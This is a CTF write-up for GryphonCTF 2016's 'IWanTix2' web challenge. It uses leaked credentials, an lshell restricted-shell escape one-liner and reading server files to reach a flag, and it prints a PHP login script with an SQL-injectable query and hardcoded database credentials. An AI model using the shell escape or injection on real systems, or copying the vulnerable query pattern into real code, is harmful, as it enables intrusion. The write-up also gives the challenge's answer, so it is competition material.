# GryphonCTF_2016: IWanTix2

Category: Web Points: 30 Description:

Get into the organiser's network and generate tickets so you can sell it at a very low price to our dear admin QR! Play at http://play.spgame.site:8002 Creator - Kelvin Neo (@deathline75) Creator - Chen Qiurong (@pc84560895)

## Write-up

This time around, we are given a url that leads to a very snarky reply by the web server.

Didn't your parents tell you not to look at unauthorised pages?



Opening up Developer's Console in Chrome reveals a delicious header.

Credentials:Look out for port 8001,user:webadmin,pass:webadmin


Connecting to port 8001 via browser, you get nothing! Or a weird OpenSSH version header anyways. So, we try to connect to it via shell.

$ssh [email protected] -p 8001 [email protected]'s password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Oct 12 14:55:07 2016 from 103.26.223.115 You are in a limited shell. Type '?' or 'help' to get the list of allowed commands webadmin:~$


Viola! Well, now we are in a limited shell. What do we do now? Hmm...

webadmin:~$? clear exit help history lpath lsudo webadmin:~$


Upon further researching, it appears we are in a limited shell, or lshell, in short. Doing some research on CVEs, we find an exploit for lshell.

webadmin:~$echo && 'bash' [email protected]:~$


Woah there!

[email protected]:/var/www/html$cat .htaccess Header set Credentials "Look out for port 8001,user:webadmin,pass:webadmin" ErrorDocument 403 /403.html order deny,allow deny from all allow from 127.0.0.1 localhost [email protected]541c:/var/www/html$ cat index.php
<html>

<body>
<p>
Welcome to the Eason Chan concert ticket generator
<br />
</p>
<input type='submit' value='Enter'>
</body>

</html>
[email protected]:/var/www/html$cat login.php <?php$servername = "db-iwantix2";
$username = "iwantix2";$password = "iwantix22";
$dbname = "iwantix2";$conn = new mysqli($servername,$username, $password,$dbname);

if ($conn->connect_error) { die("Connection failed: " .$conn->connect_error);
}

# Get POST Request..
$secret_key =$_POST['secret_key'];

$sql = "SELECT * from secret_key where secretkey = '$secret_key'";
$result =$conn->query($sql); if ($result->num_rows > 0) {
while($row =$result->fetch_assoc()) {
echo 'Nice! You can generate as many tickets as you want now!!<br />';
echo "Here's your flag! You're most welcome.<br />";
echo "GCTF{7unn3l_4nd_1nj3c7}";
}
} else {
echo "Hahahahaha! No! You cannot generate ticket!";
}

?>


Epic motherload right there. Therefore, the flag is GCTF{7unn3l_4nd_1nj3c7}.

EDIT: This was actually a bug and team JEAM was awarded 3 points for the discovery and report of this bug. What misers the organizers are. EDIT2: This was supposd to be solved via ssh [email protected] -p 8001 -L 1337:localhost:8002, accessing localhost:1337 and injecting SQLi code. Well, I think my method was abit more epic.